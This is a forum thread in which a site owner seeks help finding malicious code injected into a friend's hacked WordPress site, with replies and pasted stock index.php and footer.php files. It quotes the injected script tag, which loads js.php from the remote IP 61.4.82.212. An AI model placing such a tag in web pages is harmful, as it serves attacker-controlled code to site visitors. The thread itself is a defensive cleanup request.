Jump to content

Website Hacked: 61.4.82.212 Script Added


jsarber

Recommended Posts

My friend, The Lonely Conservative (lonelyconservative.com), had her site hacked. I am struggling to find the problem code within her Wordpress site. Here's what going on. This script has been added to the bottom of each page:

 

<script src="http://61.4.82.212/js.php"></script>

 

As you would expect, this script is not within the actual files. I assume I am looking for some kind of encoded something or other. How in the world do I go about finding it? I've been searching for more than a day.

Link to comment
Share on other sites

Just double checking... you've checked the bottom of your index.php file? (in the root of your site -- not within your theme folder) And the footer.php file within your theme folder? It looks like it's included on every page, so those are the two logical places it would be.

 

It won't necessarily be encoded -- this has happened to me in the past and it was just plain text.

Link to comment
Share on other sites

Here's the root index file:

 

<?php
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/

/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define('WP_USE_THEMES', true);

/** Loads the WordPress Environment and Template */
require('./wp-blog-header.php');
?>

 

Here's the theme's footer:

 

<?php global $wp_theme_options; ?>
<?php do_action('above_footer') ?>

</div><!--end #container-->

<div class="<?php do_action('container_style'); ?>" id="footer">
<div class="alignleft">
<strong><?php bloginfo('name'); ?></strong><br />
<?php _e('Copyright ©','flexx'); echo ' '.date('Y').' '; _e('All Rights Reserved','flexx'); ?>
</div>
<div class="alignright">
	<?php	
	$footer_credit = '<a href="http://flexxtheme.com/" title="Flexx Theme">'.__('Flexx Theme','flexx').'</a> '.__('by','flexx').' <a href="http://ithemes.com" title="WordPress Themes">iThemes</a><br />';
	$footer_credit .= __('Powered by','flexx').' <a href="http://wordpress.org">'.__('WordPress','flexx').'</a>';
	echo apply_filters('ithemes_footer_credit',$footer_credit);
	?>
</div>

<?php wp_footer(); //We need this for plugins ?>
</div>

<?php do_action('flexx_footer_stats'); ?>
</body>
</html>

 

I don't see anything, do you? I've searched the entire site for that script and every part of it. My search was fruitless which made me think it must be encoded. I also searched the database and came up short. I don't know what to do.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Loading...
×
×
  • Create New...